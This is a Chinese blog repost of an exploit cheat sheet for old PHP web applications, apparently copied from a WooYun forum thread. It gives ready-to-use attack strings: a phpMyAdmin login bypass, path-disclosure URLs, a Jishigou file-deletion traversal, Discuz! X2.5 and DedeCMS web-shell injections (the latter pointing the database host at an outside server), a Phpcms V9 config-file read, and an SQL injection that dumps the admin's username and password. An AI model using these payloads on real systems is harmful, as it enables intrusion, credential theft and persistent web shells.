- A+
显示不全请点击全屏阅读
1.phpmyadmin万能密码漏洞
影响版本:2.11.3 / 2.11.4
利用方法:用户名处写入'localhost'@'@"则登录成功。 (注意全部是英文标点符号,最后一个为英文双引号)
附上几个php爆绝对路径的办法:
http://xxx/phpMyAdmin/libraries/select_lang.lib.php
http://xxx/phpMyAdmin/darkblue_orange/layout.inc.php
http://xxx/phpMyAdmin/index.php?lang[]=1
http://xxx/phpmyadmin/themes/darkblue_orange/layout.inc.php
2.记事狗任意文件删除
在 index.php?mod=event&code=pevent
上传抓包,然后在hid_pic里填写././images/event/12345678902_b.lock/../../../data/install.lock 即可删除安装锁
3.Discuz!X2.5管理员Getshell
进后台,打开站长→UC设置,在UcenterIP填入:xx\\');eval($_POST[a])?>;//xx
shell为:http://xxx/config/config_ucenter.php
4.dede5.1-5.5Getshell
访问http://xxx/dede/plus/ad_js.php?aid=1&nocache=1
再用javascript设置:
javascript:document.cookie="GLOBALS[cfg_dbhost]=hake.cc";document.cookie="GLOBALS[cfg_dbuser]=img";document.cookie="GLOBALS[cfg_dbpwd]=d3g3f7r8";document.cookie="GLOBALS[cfg_dbname]=img";document.cookie="GLOBALS[cfg_dbprefix]=dede_";
再次访问http://xxx/dede/plus/ad_js.php?aid=1&nocache=1
生成的一句话:http://xxx/dede/plus/ln.php 密码c
5.Phpcms V9 爆密码0day
http://xxx/index.php?m=search&c=index&a=public_get_suggest_keyword&url=asdf&q=../../phpsso_server/caches/configs/database.php
6.Discuz!X2.5爆路径
爆路径文件如下:
http://xxx/uc_server/control/admin/db.php
http://xxx/source/plugin/myrepeats/table/table_myrepeats.php
http://xxx/install/include/install_lang.php
7.记事狗微博3.0 0Day exp
http://xxx/wap/index.php?mod=pm&pm_new=and(select%201%20from(select%20count(*),concat((select%20(select%20(select%20concat(0x27,0x7e,jishigou_members.username,0x27,0x7e,jishigou_members.password,0x27,0x7e)%20from%20jishigou_members%20where%20uid=1%20limit%200,1))%20from%20information_schema.tables%20limit%200,1),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)%20and%201=1
先发这些,等会儿继续
原文地址:http://zone.wooyun.org/content/1058
虽然都是广为人知的,转来留着
Tags:
如果您喜欢我的博客,欢迎点击图片定订阅到邮箱 也可以点击链接【订阅到鲜果】
如果我的想法或工具帮助到了你,也可微信扫下方二维码打赏本人一杯咖啡